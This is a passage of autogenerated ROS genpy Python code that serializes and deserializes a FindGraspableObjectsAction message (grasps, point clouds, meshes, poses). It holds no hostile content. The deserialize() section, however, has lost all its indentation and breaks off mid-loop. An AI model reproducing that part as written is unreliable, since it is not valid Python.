                        val4 = val4.encode('utf-8')
                        length = len(val4)
                    buff.write(struct.Struct('<I%ss'%length).pack(length, val4))
                length = len(_v16.points)
                buff.write(_struct_I.pack(length))
                for val4 in _v16.points:
                    length = len(val4.positions)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.positions))
                    length = len(val4.velocities)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.velocities))
                    length = len(val4.accelerations)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.accelerations))
                    length = len(val4.effort)
                    buff.write(_struct_I.pack(length))
                    pattern = '<%sd'%length
                    buff.write(struct.Struct(pattern).pack(*val4.effort))
                    _v19 = val4.time_from_start
                    _x = _v19
                    buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
                # grasp_pose: geometry_msgs/PoseStamped
                _v20 = val2.grasp_pose
                _v21 = _v20.header
                _x = _v21.seq
                buff.write(_get_struct_I().pack(_x))
                _v22 = _v21.stamp
                _x = _v22
                buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
                _x = _v21.frame_id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _v23 = _v20.pose
                _v24 = _v23.position
                _x = _v24
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _v25 = _v23.orientation
                _x = _v25
                buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
                _x = val2.grasp_quality
                buff.write(_get_struct_d().pack(_x))
                # pre_grasp_approach: moveit_msgs/GripperTranslation
                _v26 = val2.pre_grasp_approach
                _v27 = _v26.direction
                _v28 = _v27.header
                _x = _v28.seq
                buff.write(_get_struct_I().pack(_x))
                _v29 = _v28.stamp
                _x = _v29
                buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
                _x = _v28.frame_id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _v30 = _v27.vector
                _x = _v30
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _x = _v26
                buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
                # post_grasp_retreat: moveit_msgs/GripperTranslation
                _v31 = val2.post_grasp_retreat
                _v32 = _v31.direction
                _v33 = _v32.header
                _x = _v33.seq
                buff.write(_get_struct_I().pack(_x))
                _v34 = _v33.stamp
                _x = _v34
                buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
                _x = _v33.frame_id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _v35 = _v32.vector
                _x = _v35
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _x = _v31
                buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
                # post_place_retreat: moveit_msgs/GripperTranslation
                _v36 = val2.post_place_retreat
                _v37 = _v36.direction
                _v38 = _v37.header
                _x = _v38.seq
                buff.write(_get_struct_I().pack(_x))
                _v39 = _v38.stamp
                _x = _v39
                buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
                _x = _v38.frame_id
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _v40 = _v37.vector
                _x = _v40
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _x = _v36
                buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
                _x = val2.max_contact_force
                buff.write(_get_struct_f().pack(_x))
                length = len(val2.allowed_touch_objects)
                buff.write(_struct_I.pack(length))
                for val3 in val2.allowed_touch_objects:
                    length = len(val3)
                    if python3 or type(val3) == unicode:
                        val3 = val3.encode('utf-8')
                        length = len(val3)
                    buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
        # --- action_result.result.support_surfaces: Object[] (same layout as
        # the object part above, but with no grasps) ---
        length = len(self.action_result.result.support_surfaces)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_result.result.support_surfaces:
            _v41 = val1.header
            _x = _v41.seq
            buff.write(_get_struct_I().pack(_x))
            _v42 = _v41.stamp
            _x = _v42
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v41.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = val1.name
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = val1.support_surface
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            length = len(val1.properties)
            buff.write(_struct_I.pack(length))
            for val2 in val1.properties:
                _x = val2.name
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _x = val2.value
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _v43 = val1.point_cluster
            _v44 = _v43.header
            _x = _v44.seq
            buff.write(_get_struct_I().pack(_x))
            _v45 = _v44.stamp
            _x = _v45
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v44.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = _v43
            buff.write(_get_struct_2I().pack(_x.height, _x.width))
            length = len(_v43.fields)
            buff.write(_struct_I.pack(length))
            for val3 in _v43.fields:
                _x = val3.name
                length = len(_x)
                if python3 or type(_x) == unicode:
                    _x = _x.encode('utf-8')
                    length = len(_x)
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
                _x = val3
                buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
            _x = _v43
            buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
            _x = _v43.data
            length = len(_x)
            # - if encoded as a list instead, serialize as bytes instead of string
            if type(_x) in [list, tuple]:
                buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
            else:
                buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = _v43.is_dense
            buff.write(_get_struct_B().pack(_x))
            length = len(val1.primitives)
            buff.write(_struct_I.pack(length))
            for val2 in val1.primitives:
                _x = val2.type
                buff.write(_get_struct_B().pack(_x))
                length = len(val2.dimensions)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val2.dimensions))
            length = len(val1.primitive_poses)
            buff.write(_struct_I.pack(length))
            for val2 in val1.primitive_poses:
                _v46 = val2.position
                _x = _v46
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _v47 = val2.orientation
                _x = _v47
                buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
            length = len(val1.meshes)
            buff.write(_struct_I.pack(length))
            for val2 in val1.meshes:
                length = len(val2.triangles)
                buff.write(_struct_I.pack(length))
                for val3 in val2.triangles:
                    buff.write(_get_struct_3I().pack(*val3.vertex_indices))
                length = len(val2.vertices)
                buff.write(_struct_I.pack(length))
                for val3 in val2.vertices:
                    _x = val3
                    buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            length = len(val1.mesh_poses)
            buff.write(_struct_I.pack(length))
            for val2 in val1.mesh_poses:
                _v48 = val2.position
                _x = _v48
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
                _v49 = val2.orientation
                _x = _v49
                buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
            _v50 = val1.surface
            buff.write(_get_struct_4d().pack(*_v50.coef))
        # --- action_feedback: header + GoalStatus + feedback (one GraspableObject) ---
        _x = self
        buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
        _x = self.action_feedback.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self
        buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
        _x = self.action_feedback.status.goal_id.id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self.action_feedback.status.status
        buff.write(_get_struct_B().pack(_x))
        _x = self.action_feedback.status.text
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        # feedback.object.object (same Object layout as above, written out
        # with fully-qualified paths rather than a loop variable)
        _x = self
        buff.write(_get_struct_3I().pack(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs))
        _x = self.action_feedback.feedback.object.object.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self.action_feedback.feedback.object.object.name
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self.action_feedback.feedback.object.object.support_surface
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        length = len(self.action_feedback.feedback.object.object.properties)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.object.properties:
            _x = val1.name
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = val1.value
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self
        buff.write(_get_struct_3I().pack(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs))
        _x = self.action_feedback.feedback.object.object.point_cluster.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self
        buff.write(_get_struct_2I().pack(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width))
        length = len(self.action_feedback.feedback.object.object.point_cluster.fields)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.object.point_cluster.fields:
            _x = val1.name
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _x = val1
            buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
        _x = self
        buff.write(_get_struct_B2I().pack(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step))
        _x = self.action_feedback.feedback.object.object.point_cluster.data
        length = len(_x)
        # - if encoded as a list instead, serialize as bytes instead of string
        if type(_x) in [list, tuple]:
            buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
        else:
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
        _x = self.action_feedback.feedback.object.object.point_cluster.is_dense
        buff.write(_get_struct_B().pack(_x))
        length = len(self.action_feedback.feedback.object.object.primitives)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.object.primitives:
            _x = val1.type
            buff.write(_get_struct_B().pack(_x))
            length = len(val1.dimensions)
            buff.write(_struct_I.pack(length))
            pattern = '<%sd'%length
            buff.write(struct.Struct(pattern).pack(*val1.dimensions))
        length = len(self.action_feedback.feedback.object.object.primitive_poses)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.object.primitive_poses:
            _v51 = val1.position
            _x = _v51
            buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            _v52 = val1.orientation
            _x = _v52
            buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
        length = len(self.action_feedback.feedback.object.object.meshes)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.object.meshes:
            length = len(val1.triangles)
            buff.write(_struct_I.pack(length))
            for val2 in val1.triangles:
                buff.write(_get_struct_3I().pack(*val2.vertex_indices))
            length = len(val1.vertices)
            buff.write(_struct_I.pack(length))
            for val2 in val1.vertices:
                _x = val2
                buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        length = len(self.action_feedback.feedback.object.object.mesh_poses)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.object.mesh_poses:
            _v53 = val1.position
            _x = _v53
            buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            _v54 = val1.orientation
            _x = _v54
            buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
        buff.write(_get_struct_4d().pack(*self.action_feedback.feedback.object.object.surface.coef))
        # feedback.object.grasps: moveit_msgs/Grasp[] (same layout as the
        # result-side grasp loop above)
        length = len(self.action_feedback.feedback.object.grasps)
        buff.write(_struct_I.pack(length))
        for val1 in self.action_feedback.feedback.object.grasps:
            _x = val1.id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _v55 = val1.pre_grasp_posture
            _v56 = _v55.header
            _x = _v56.seq
            buff.write(_get_struct_I().pack(_x))
            _v57 = _v56.stamp
            _x = _v57
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v56.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            length = len(_v55.joint_names)
            buff.write(_struct_I.pack(length))
            for val3 in _v55.joint_names:
                length = len(val3)
                if python3 or type(val3) == unicode:
                    val3 = val3.encode('utf-8')
                    length = len(val3)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
            length = len(_v55.points)
            buff.write(_struct_I.pack(length))
            for val3 in _v55.points:
                length = len(val3.positions)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.positions))
                length = len(val3.velocities)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.velocities))
                length = len(val3.accelerations)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.accelerations))
                length = len(val3.effort)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.effort))
                _v58 = val3.time_from_start
                _x = _v58
                buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
            _v59 = val1.grasp_posture
            _v60 = _v59.header
            _x = _v60.seq
            buff.write(_get_struct_I().pack(_x))
            _v61 = _v60.stamp
            _x = _v61
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v60.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            length = len(_v59.joint_names)
            buff.write(_struct_I.pack(length))
            for val3 in _v59.joint_names:
                length = len(val3)
                if python3 or type(val3) == unicode:
                    val3 = val3.encode('utf-8')
                    length = len(val3)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
            length = len(_v59.points)
            buff.write(_struct_I.pack(length))
            for val3 in _v59.points:
                length = len(val3.positions)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.positions))
                length = len(val3.velocities)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.velocities))
                length = len(val3.accelerations)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.accelerations))
                length = len(val3.effort)
                buff.write(_struct_I.pack(length))
                pattern = '<%sd'%length
                buff.write(struct.Struct(pattern).pack(*val3.effort))
                _v62 = val3.time_from_start
                _x = _v62
                buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
            _v63 = val1.grasp_pose
            _v64 = _v63.header
            _x = _v64.seq
            buff.write(_get_struct_I().pack(_x))
            _v65 = _v64.stamp
            _x = _v65
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v64.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _v66 = _v63.pose
            _v67 = _v66.position
            _x = _v67
            buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            _v68 = _v66.orientation
            _x = _v68
            buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
            _x = val1.grasp_quality
            buff.write(_get_struct_d().pack(_x))
            _v69 = val1.pre_grasp_approach
            _v70 = _v69.direction
            _v71 = _v70.header
            _x = _v71.seq
            buff.write(_get_struct_I().pack(_x))
            _v72 = _v71.stamp
            _x = _v72
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v71.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _v73 = _v70.vector
            _x = _v73
            buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            _x = _v69
            buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
            _v74 = val1.post_grasp_retreat
            _v75 = _v74.direction
            _v76 = _v75.header
            _x = _v76.seq
            buff.write(_get_struct_I().pack(_x))
            _v77 = _v76.stamp
            _x = _v77
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v76.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _v78 = _v75.vector
            _x = _v78
            buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            _x = _v74
            buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
            _v79 = val1.post_place_retreat
            _v80 = _v79.direction
            _v81 = _v80.header
            _x = _v81.seq
            buff.write(_get_struct_I().pack(_x))
            _v82 = _v81.stamp
            _x = _v82
            buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
            _x = _v81.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
            _v83 = _v80.vector
            _x = _v83
            buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
            _x = _v79
            buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
            _x = val1.max_contact_force
            buff.write(_get_struct_f().pack(_x))
            length = len(val1.allowed_touch_objects)
            buff.write(_struct_I.pack(length))
            for val2 in val1.allowed_touch_objects:
                length = len(val2)
                if python3 or type(val2) == unicode:
                    val2 = val2.encode('utf-8')
                    length = len(val2)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val2))
    # Report pack failures through genpy's type-checking hook rather than
    # letting raw struct/TypeError escape to the caller.
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
# NOTE(review): autogenerated genpy deserializer — do not hand-edit the decode
# sequence; each `start = end; end += N` pair walks the little-endian wire
# format in declaration order. The parameter name `str` shadows the builtin
# (generator convention; kept for interface compatibility).
# Register this message type with the "rosmsg" codec error handler so decode
# failures can report which message type was being parsed.
codecs.lookup_error("rosmsg").msg_type = self._type
try:
# Lazily default-construct the three sub-messages of the action wrapper.
if self.action_goal is None:
self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
if self.action_result is None:
self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
end = 0
# --- action_goal.header: seq + stamp (3 uint32), then frame_id string ---
_x = self
start = end
end += 12
(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.header.frame_id = str[start:end]
# --- action_goal.goal_id: stamp (2 uint32) + id string ---
_x = self
start = end
end += 8
(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_goal.goal_id.id = str[start:end]
# --- goal.plan_grasps (bool as uint8) packed together with action_result.header (3 uint32) ---
_x = self
start = end
end += 13
(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_B3I().unpack(str[start:end])
self.action_goal.goal.plan_grasps = bool(self.action_goal.goal.plan_grasps)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.header.frame_id = str[start:end]
# --- action_result.status: goal_id stamp/id, status byte, text string ---
_x = self
start = end
end += 8
(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_result.status.text = str[start:end]
# --- action_result.result.objects: length-prefixed list of GraspableObject ---
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.objects = []
for i in range(0, length):
val1 = grasping_msgs.msg.GraspableObject()
# val1.object is a grasping_msgs/Object: header, name, support_surface,
# properties[], point_cluster (PointCloud2), primitives[], primitive_poses[],
# meshes[], mesh_poses[], surface plane coefficients.
_v84 = val1.object
_v85 = _v84.header
start = end
end += 4
(_v85.seq,) = _get_struct_I().unpack(str[start:end])
_v86 = _v85.stamp
_x = _v86
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v85.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v85.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v84.name = str[start:end].decode('utf-8', 'rosmsg')
else:
_v84.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v84.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
_v84.support_surface = str[start:end]
# ObjectProperty list: (name, value) string pairs.
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.properties = []
for i in range(0, length):
val3 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.value = str[start:end]
_v84.properties.append(val3)
# point_cluster: sensor_msgs/PointCloud2.
_v87 = _v84.point_cluster
_v88 = _v87.header
start = end
end += 4
(_v88.seq,) = _get_struct_I().unpack(str[start:end])
_v89 = _v88.stamp
_x = _v89
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v88.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v88.frame_id = str[start:end]
_x = _v87
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v87.fields = []
for i in range(0, length):
val4 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val4.name = str[start:end]
_x = val4
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v87.fields.append(val4)
_x = _v87
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v87.is_bigendian = bool(_v87.is_bigendian)
# Raw point data stays as a byte string (no decode).
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v87.data = str[start:end]
start = end
end += 1
(_v87.is_dense,) = _get_struct_B().unpack(str[start:end])
_v87.is_dense = bool(_v87.is_dense)
# primitives: shape_msgs/SolidPrimitive (type byte + variable-length float64 dims).
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.primitives = []
for i in range(0, length):
val3 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val3.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.dimensions = s.unpack(str[start:end])
_v84.primitives.append(val3)
# primitive_poses: geometry_msgs/Pose (3 float64 position + 4 float64 quaternion).
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.primitive_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v90 = val3.position
_x = _v90
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v91 = val3.orientation
_x = _v91
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v84.primitive_poses.append(val3)
# meshes: shape_msgs/Mesh = triangles (3 uint32 indices each) + vertices (Point).
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.meshes = []
for i in range(0, length):
val3 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.triangles = []
for i in range(0, length):
val4 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val4.vertex_indices = _get_struct_3I().unpack(str[start:end])
val3.triangles.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val3.vertices.append(val4)
_v84.meshes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v84.mesh_poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v92 = val3.position
_x = _v92
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v93 = val3.orientation
_x = _v93
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v84.mesh_poses.append(val3)
# surface: plane coefficients, 4 float64.
_v94 = _v84.surface
start = end
end += 32
_v94.coef = _get_struct_4d().unpack(str[start:end])
# val1.grasps: length-prefixed list of moveit_msgs/Grasp.
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.grasps = []
for i in range(0, length):
val2 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
# pre_grasp_posture: trajectory_msgs/JointTrajectory.
_v95 = val2.pre_grasp_posture
_v96 = _v95.header
start = end
end += 4
